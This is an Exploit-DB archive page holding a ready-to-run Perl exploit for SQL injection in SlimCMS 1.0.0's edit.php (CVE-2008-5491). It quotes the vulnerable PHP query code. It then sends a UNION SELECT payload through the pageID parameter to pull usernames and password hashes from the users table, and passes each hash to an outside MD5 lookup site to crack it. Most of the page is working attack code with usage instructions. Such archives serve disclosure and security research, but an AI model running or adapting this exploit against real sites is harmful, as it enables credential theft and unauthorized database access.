SlimCMS 1.0.0 - 'edit.php' SQL Injection

EDB-ID:

7121

CVE:

2008-5491

EDB Verified:

Author:

StAkeR

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-11-14

Vulnerable App: 
#!/usr/bin/perl

=starting

 --------------------------------------------------------
 SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit
 --------------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 
 download on sourceforge 
 
 
 File edit.php
 
 111. if ($password == md5($_POST['password']))
 112. {
 113.    if (strlen($_POST['cmsText']) > 2) {
 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".
      strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];
 115. mysql_query($query);
 116. //$successfulyUpdated
 117. responseText = $successfulyUpdated;
 118. }
 119.
 120. if (strlen($_GET['pageID']) > 0) {
 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];
 122. $result = mysql_query($query);
 123.
 124.				
 125. while($row = mysql_fetch_array($result)) {
 126.	$pageTitle = $row['title'];
 127.	$pageContent = $row['content'];
 128.  }
 129. }
 
 NOTE: Works Regardless PHP.ini Settings!
 
  
  you must be logged..
  
  Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]
  
  Output: Username: athos
          Password: 27e43424d53719a645ae7cca038b45be
 
 

=cut

use strict;
use LWP::UserAgent;
use LWP::Simple;

my $match = q{Editing page "(.+?)"};
my $http = new LWP::UserAgent; 
my $post = undef;
my @login = ();
my @out = ();

my ($host,$auth,$myid) = @ARGV;

unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)
{
    print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; 
    exit;
} 

$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";

@login = split(':',$auth);

$post = $http->post($host,[ 
                            username => $login[0],
                            password => $login[1],
                         ]);


if($post->is_success && $post->content =~ $match) 
{
    @out = split(':',$1);
   
    if($#out => 2)
    {
        my $cracked = search_MD5($out[1]);
        
        print STDOUT "Username: $out[0]\r\n";
        print STDOUT "Password: $out[1] -> $cracked\r\n";
        exit;  
   }
   else
   {
       print STDOUT "Exploit Failed!\r\n";
       print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";
       exit;
   }
}


sub search_MD5
{
    my $hash = shift @_;
    my $cont = undef;

    $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
        
    if(length($hash) => 32 && !is_error($cont))
    {
        return $cont;
    }
    else
    {
        return exit;
    }
}   
    
__END__

# milw0rm.com [2008-11-14]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services